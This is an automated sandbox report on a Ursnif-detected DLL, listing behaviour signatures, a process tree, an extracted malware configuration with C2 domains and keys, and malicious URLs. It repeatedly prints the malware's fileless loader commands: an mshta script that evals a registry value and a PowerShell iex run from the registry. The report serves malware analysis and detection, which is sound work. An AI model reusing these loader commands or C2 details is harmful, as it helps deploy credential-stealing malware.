
Windows Analysis Report data.dll

Overview

General Information

Sample Name: data.dll
Analysis ID: 498359
MD5: b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1: 4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256: 7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
Tags: dll
Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
May check the online IP address of the machine
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6856 cmdline: loaddll32.exe 'C:\Users\user\Desktop\data.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 484 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 1848 cmdline: rundll32.exe 'C:\Users\user\Desktop\data.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4868 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6508 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6616 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4500 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Father MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 1444 cmdline: rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 6988 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 3980 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 4812 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4588 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6836 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5528 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6200 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • RuntimeBroker.exe (PID: 3656 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 5008 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 1424 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • cmd.exe (PID: 3512 cmdline: cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • RuntimeBroker.exe (PID: 4268 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4772 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 1260 cmdline: 'C:\Windows\syswow64\cmd.exe' /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • mshta.exe (PID: 6692 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 3740 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 2812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 7024 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4504 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2088 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6248 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp | JoeSecurity_Ursnif_2 | Yara detected Ursnif | Joe Security |
00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(5 of 98 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.3.loaddll32.exe.10d8cd6.0.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.dd0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
3.2.rundll32.exe.5d0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.30a94a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
5.3.rundll32.exe.4f694a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(5 of 19 entries shown)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: Mshta Spawning Windows Shell
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4588, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline', ProcessId: 6836
Sigma detected: Suspicious Rundll32 Activity
Source: Process started; Author: juju4, Jonhnathan Ribeiro, oscd.community; Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 6988, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 3980
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588
Sigma detected: T1086 PowerShell Execution
Source: Pipe created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: PipeName: \PSHost.132780367479355110.4588.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4812, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4588

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/lbK; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/l; Avira URL Cloud: Label: malware
Source: http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i; Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp; Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "TQcvS5IrBIzT3+zGJZ6/B2cbmD8QQfXWsXQyoKLnldUl+fxloKcyGDdinb2QDD2PXD9XpRc5HbwrNqmPhmWJ0e/UBRwWUbictoSBMJ4aPIlTym7tmGSfnad7IPv5Srn06Y3XBZuYQ1Xys1ZxJwHplzKU0w90/qyyPVRqKOq/MLuCVIMXJCRzYsm45jCi3wlMV3wGL62NM3woVBhffjDDamQ53wj1axbnrsRRrHGvT3qf401ulwz8Ta2wR4uBYmHqgQhJz/9sbeghYJb5FWrjfTJDZcpuOb/2rXGCjZzLO89NTeNJJsLx8uenN3zhb+nnl/3yl1tkz3umoGAvkIUnqQXKMRLBu54y8WHgbT1gdAw=", "c2_domain": ["init.icecreambob.com", "app.updatebrouser.com", "fun.lakeofgold.com"], "botnet": "3500", "server": "580", "serpent_key": "34V2LBzJE8iG98YR", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: data.dll; Virustotal: Detection: 7%
Multi AV Scanner detection for domain / URL
Source: art.microsoftsofymicrosoftsoft.at; Virustotal: Detection: 10%
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00DD3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,0_2_00DD3FAB
Source: data.dll; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: data.dll; Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: h.pdb> source: powershell.exe, 0000000F.00000003.961179690.0000029E611B1000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdbXP source: powershell.exe, 0000000F.00000002.1028629479.0000029E4CF68000.00000004.00000001.sdmp
